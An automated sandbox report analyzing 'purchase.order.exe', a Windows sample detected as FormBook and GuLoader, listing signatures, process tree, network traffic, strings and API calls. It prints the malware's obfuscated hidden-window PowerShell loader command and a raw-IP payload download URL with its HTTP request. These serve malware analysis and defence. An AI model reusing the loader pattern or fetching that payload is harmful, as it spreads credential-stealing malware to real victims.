Windows Analysis Report
purchase.order.exe

Overview

General Information

Sample name: purchase.order.exe
Analysis ID: 1572377
MD5: 8125e510df447b0ead0e263d006a253e
SHA1: d1c5a46902e50a785d7be8822b5e80e262cf640d
SHA256: 91e694f4ad9556406db3d63be6b1917edbd509118a83a9d920fc758f0b8d0a54
Tags: exe, user-abuse_ch

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • purchase.order.exe (PID: 7344 cmdline: "C:\Users\user\Desktop\purchase.order.exe" MD5: 8125E510DF447B0EAD0E263D006A253E)
    • powershell.exe (PID: 7584 cmdline: powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri';$Fortolkningssikker=$Unsolaced207.SubString(29825,3);.$Fortolkningssikker($Unsolaced207) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Fathoming.exe (PID: 6888 cmdline: "C:\Users\user\AppData\Local\Temp\Fathoming.exe" MD5: 8125E510DF447B0EAD0E263D006A253E)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000008.00000002.3003104703.0000000021750000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2661158092.0000000008F37000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

      System Summary

      Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri';$Fortolkningssikker=$Unsolaced207.SubString(29825,3);.$Fortolkningssikker($Unsolaced207), CommandLine: powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri';$Fortolkningssikker=$Unsolaced207.SubString(29825,3);.$Fortolkningssikker($Unsolaced207), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\purchase.order.exe", ParentImage: C:\Users\user\Desktop\purchase.order.exe, ParentProcessId: 7344, ParentProcessName: purchase.order.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri';$Fortolkningssikker=$Unsolaced207.SubString(29825,3);.$Fortolkningssikker($Unsolaced207), ProcessId: 7584, ProcessName: powershell.exe
      Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri';$Fortolkningssikker=$Unsolaced207.SubString(29825,3);.$Fortolkningssikker($Unsolaced207), CommandLine: powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri';$Fortolkningssikker=$Unsolaced207.SubString(29825,3);.$Fortolkningssikker($Unsolaced207), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\purchase.order.exe", ParentImage: C:\Users\user\Desktop\purchase.order.exe, ParentProcessId: 7344, ParentProcessName: purchase.order.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri';$Fortolkningssikker=$Unsolaced207.SubString(29825,3);.$Fortolkningssikker($Unsolaced207), ProcessId: 7584, ProcessName: powershell.exe
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-12-10T14:09:52.971466+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49707 | 212.162.149.66 | 80 | TCP


      AV Detection

      Source: http://212.162.149.66/JiYpNWaslXZHcEPiPEuXaEONVju173.bin | Avira URL Cloud: Label: malware
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | ReversingLabs: Detection: 18%
      Source: purchase.order.exe | ReversingLabs: Detection: 18%
      Source: Yara match | File source: 00000008.00000002.3003104703.0000000021750000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Joe Sandbox ML: detected
      Source: purchase.order.exe | Joe Sandbox ML: detected
      Source: purchase.order.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: purchase.order.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb | source: Fathoming.exe, 00000008.00000001.2634328623.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: Binary string: stem.Core.pdba | source: powershell.exe, 00000002.00000002.2642154478.0000000006D9F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP | source: Fathoming.exe, 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp, Fathoming.exe, 00000008.00000003.2950366409.0000000021901000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb | source: Fathoming.exe, Fathoming.exe, 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp, Fathoming.exe, 00000008.00000003.2950366409.0000000021901000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP | source: Fathoming.exe, 00000008.00000001.2634328623.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: C:\Users\user\Desktop\purchase.order.exe | Code function: 0_2_0040689E FindFirstFileW,FindClose,0_2_0040689E
      Source: C:\Users\user\Desktop\purchase.order.exe | Code function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4D
      Source: C:\Users\user\Desktop\purchase.order.exe | Code function: 0_2_00402930 FindFirstFileW,0_2_00402930
      Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49707 -> 212.162.149.66:80
      Source: global traffic | HTTP traffic detected:
        GET /JiYpNWaslXZHcEPiPEuXaEONVju173.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: 212.162.149.66
        Cache-Control: no-cache
      Source: unknown | TCP traffic detected without corresponding DNS query: 212.162.149.66
      Source: global traffic | HTTP traffic detected:
        GET /JiYpNWaslXZHcEPiPEuXaEONVju173.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: 212.162.149.66
        Cache-Control: no-cache
      Source: Fathoming.exe, 00000008.00000002.2990245007.0000000006028000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.162.149.66/JiYpNWaslXZHcEPiPEuXaEONVju173.bin
      Source: Fathoming.exe, 00000008.00000003.2948566344.0000000006074000.00000004.00000020.00020000.00000000.sdmp, Fathoming.exe, 00000008.00000002.2990340347.0000000006074000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.162.149.66/JiYpNWaslXZHcEPiPEuXaEONVju173.bin)
      Source: powershell.exe, 00000002.00000002.2642154478.0000000006D30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
      Source: purchase.order.exe, 00000000.00000000.1421338279.000000000040A000.00000008.00000001.01000000.00000003.sdmp, purchase.order.exe, 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Fathoming.exe, 00000008.00000000.2633837075.000000000040A000.00000008.00000001.01000000.00000007.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000002.00000002.2640675750.00000000056FA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000002.00000002.2635924027.0000000004691000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: Fathoming.exe, 00000008.00000001.2634328623.0000000000649000.00000020.00000001.01000000.00000008.sdmp | String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: powershell.exe, 00000002.00000002.2659979907.0000000007FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
      Source: powershell.exe, 00000002.00000002.2635924027.0000000004691000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 00000002.00000002.2640675750.00000000056FA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.2640675750.00000000056FA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.2640675750.00000000056FA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000002.00000002.2635924027.00000000047E6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
      Source: Fathoming.exe, 00000008.00000001.2634328623.0000000000649000.00000020.00000001.01000000.00000008.sdmp | String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: powershell.exe, 00000002.00000002.2640675750.00000000056FA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
      Source: C:\Users\user\Desktop\purchase.order.exe | Code function: 0_2_00405705 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405705

      E-Banking Fraud

      Source: Yara match | File source: 00000008.00000002.3003104703.0000000021750000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

      Source: initial sample | Static PE information: Filename: purchase.order.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Fathoming.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process Stats: CPU usage > 49%
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22B60 NtClose,LdrInitializeThunk,8_2_21B22B60
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_21B22DF0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_21B22C70
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B235C0 NtCreateMutant,LdrInitializeThunk,8_2_21B235C0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B24340 NtSetContextThread,8_2_21B24340
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B24650 NtSuspendThread,8_2_21B24650
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22BA0 NtEnumerateValueKey,8_2_21B22BA0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22B80 NtQueryInformationFile,8_2_21B22B80
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22BF0 NtAllocateVirtualMemory,8_2_21B22BF0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22BE0 NtQueryValueKey,8_2_21B22BE0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22AB0 NtWaitForSingleObject,8_2_21B22AB0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22AF0 NtWriteFile,8_2_21B22AF0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22AD0 NtReadFile,8_2_21B22AD0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22DB0 NtEnumerateKey,8_2_21B22DB0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22DD0 NtDelayExecution,8_2_21B22DD0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22D30 NtUnmapViewOfSection,8_2_21B22D30
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22D10 NtMapViewOfSection,8_2_21B22D10
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22D00 NtSetInformationFile,8_2_21B22D00
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22CA0 NtQueryInformationToken,8_2_21B22CA0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22CF0 NtOpenProcess,8_2_21B22CF0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22CC0 NtQueryVirtualMemory,8_2_21B22CC0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22C00 NtQueryInformationProcess,8_2_21B22C00
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22C60 NtCreateKey,8_2_21B22C60
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22FB0 NtResumeThread,8_2_21B22FB0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22FA0 NtQuerySection,8_2_21B22FA0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22F90 NtProtectVirtualMemory,8_2_21B22F90
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22FE0 NtCreateFile,8_2_21B22FE0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22F30 NtCreateSection,8_2_21B22F30
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22F60 NtCreateProcessEx,8_2_21B22F60
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22EA0 NtAdjustPrivilegesToken,8_2_21B22EA0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22E80 NtReadVirtualMemory,8_2_21B22E80
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22EE0 NtQueueApcThread,8_2_21B22EE0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B22E30 NtWriteVirtualMemory,8_2_21B22E30
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B23090 NtSetValueKey,8_2_21B23090
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B23010 NtOpenDirectoryObject,8_2_21B23010
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B239B0 NtGetContextThread,8_2_21B239B0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B23D10 NtOpenProcessToken,8_2_21B23D10
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exe | Code function: 8_2_21B23D70 NtOpenThread,8_2_21B23D70
      Source: C:\Users\user\Desktop\purchase.order.exe | Code function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040351C
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B69C328_2_21B69C32
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BAFFB18_2_21BAFFB1
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF1F928_2_21AF1F92
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AB3FD28_2_21AB3FD2
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AB3FD58_2_21AB3FD5
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BAFF098_2_21BAFF09
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF9EB08_2_21AF9EB0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: String function: 21ADB970 appears 283 times
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: String function: 21B37E54 appears 111 times
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: String function: 21B25130 appears 58 times
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: String function: 21B6F290 appears 105 times
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: String function: 21B5EA12 appears 86 times
      Source: purchase.order.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engine | Classification label: mal100.troj.evad.winEXE@6/13@0/1
      Source: C:\Users\user\Desktop\purchase.order.exe | Code function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\purchase.order.exe | Code function: 0_2_004049B1 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
      Source: C:\Users\user\Desktop\purchase.order.exe | Code function: 0_2_004021CF CoCreateInstance
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
      Source: C:\Users\user\Desktop\purchase.order.exe | File created: C:\Users\user\AppData\Local\Temp\nsm43AE.tmp
      Source: purchase.order.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\purchase.order.exe | File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\purchase.order.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: purchase.order.exe | ReversingLabs: Detection: 18%
      Source: C:\Users\user\Desktop\purchase.order.exe | File read: C:\Users\user\Desktop\purchase.order.exe
      Source: unknown | Process created: C:\Users\user\Desktop\purchase.order.exe "C:\Users\user\Desktop\purchase.order.exe"
      Source: C:\Users\user\Desktop\purchase.order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri';$Fortolkningssikker=$Unsolaced207.SubString(29825,3);.$Fortolkningssikker($Unsolaced207)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Fathoming.exe "C:\Users\user\AppData\Local\Temp\Fathoming.exe"
      Source: C:\Users\user\Desktop\purchase.order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri';$Fortolkningssikker=$Unsolaced207.SubString(29825,3);.$Fortolkningssikker($Unsolaced207)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Fathoming.exe "C:\Users\user\AppData\Local\Temp\Fathoming.exe"
      Source: C:\Users\user\Desktop\purchase.order.exe | Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\purchase.order.exe | Section loaded: userenv.dll
      Source: C:\Users\user\Desktop\purchase.order.exe | Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\purchase.order.exe | Section loaded: propsys.dll
      Source: C:\Users\user\Desktop\purchase.order.exe | Section loaded: dwmapi.dll
      Source: C:\Users\user\Desktop\purchase.order.exe | Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\purchase.order.exe | Section loaded: oleacc.dll
      Source: C:\Users\user\Desktop\purchase.order.exe | Section loaded: ntmarta.dll
      Source: C:\Users\user\Desktop\purchase.order.exe | Section loaded: version.dll
      Source: C:\Users\user\Desktop\purchase.order.exe | Section loaded: shfolder.dll
      Source: C:\Users\user\Desktop\purchase.order.exe | Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\purchase.order.exe | Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\purchase.order.exe | Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\purchase.order.exe | Section loaded: riched20.dll
      Source: C:\Users\user\Desktop\purchase.order.exe | Section loaded: usp10.dll
      Source: C:\Users\user\Desktop\purchase.order.exe | Section loaded: msls31.dll
      Source: C:\Users\user\Desktop\purchase.order.exe | Section loaded: textinputframework.dll
      Source: C:\Users\user\Desktop\purchase.order.exe | Section loaded: coreuicomponents.dll
      Source: C:\Users\user\Desktop\purchase.order.exe | Section loaded: coremessaging.dll
      Source: C:\Users\user\Desktop\purchase.order.exe | Section loaded: coremessaging.dll
      Source: C:\Users\user\Desktop\purchase.order.exe | Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\purchase.order.exe | Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\purchase.order.exe | Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\purchase.order.exe | Section loaded: textshaping.dll
      Source: C:\Users\user\Desktop\purchase.order.exe | Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
